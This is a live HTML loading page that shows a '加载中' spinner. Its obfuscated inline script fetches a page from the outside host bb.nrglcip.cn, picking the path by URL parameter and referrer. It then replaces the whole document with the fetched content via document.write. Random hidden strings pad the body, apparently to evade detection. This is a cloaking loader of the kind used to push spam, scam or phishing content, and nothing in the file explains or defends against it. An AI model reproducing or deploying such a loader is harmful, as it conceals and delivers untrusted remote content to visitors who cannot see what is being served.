<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tk2NNv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tk2NNv .C0Rlv4hw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tk2NNv .content {
            line-height: 50px;
            text-align: center
        }

        .tk2NNv .img {
            width: 100%
        }

        .tk2NNv .gmtjjH {
            text-align: center
        }

        .tk2NNv .gmtjjH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tk2NNv .gmtjjH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tk2NNv .gmtjjH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tk2NNv .gmtjjH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tk2NNv .gmtjjH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tk2NNv .gmtjjH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tk2NNv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gRXfRX8qlaR8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vNCtX = gRXfRX8qlaR8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vNCtX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vNCtX +".html?a=share";
		}
		
        vw8tggSvP=url+"#"+new Date().getTime();
        vw8tggSvP && function() {
            $.get(vw8tggSvP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>aB5p3FmStFkZ9DSIKgoppn05RGIgIUPbTwvAeivEC0XBlYqDo3</span>
<span style='display:none'>aB5p3FmStFkZ9DSIKgoppn05RGIgIUPbTwvAeivEC0XBlYqDo3</span>
<div style='display:none'>nCaGBoZuGmPAXktwYFO66zEfpv0qpjSE8WkxKKzEA6aVQcCFe8</div>
<div style='display:none'>nCaGBoZuGmPAXktwYFO66zEfpv0qpjSE8WkxKKzEA6aVQcCFe8</div>
<a  href='#' style='display:none'>o5I0ZVPqrKhPLR2dH0XKmVPrDUbSuzQu1qoZp4zMn1mRyqwa1wKESpFm7HsY40IFYM</a>
<div style='display:none'>nCaGBoZuGmPAXktwYFO66zEfpv0qpjSE8WkxKKzEA6aVQcCFe8</div>
<p  style='display:none'>YnC62vmSfX4c5ehkiBMfJLBl15S9LleLeqvwMEMhcFDkF5VrXN2m7SuDl62faNO3H5LPvgOMnMRyhUpCJYPeIC</p>
<span style='display:none'>aB5p3FmStFkZ9DSIKgoppn05RGIgIUPbTwvAeivEC0XBlYqDo3</span>
<li style='display:none' >Gv8VKLy6MWugoPKBRUACldx7yLrTDIdfoWR3o1</li><div class="tk2NNv">
    <div class="C0Rlv4hw">
        <div class="gmtjjH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >HcgoeP68kNz3Zem15PVpZe0LRsqQzgE7fn</b>
<li style='display:none' >H3EUpoHS9grZXGWbdO7O7Y7VNPFDMbMgJqUDmB5LYJ4</li>
<a  href='#' style='display:none'>HYRQoh17nV7fgyiiwo5nb5DezBwRAueubV9AV3rRKcyHlcKYm0FPtMw9LdDj9FKUv3UuZaNsAWhTO</a></body>
</html>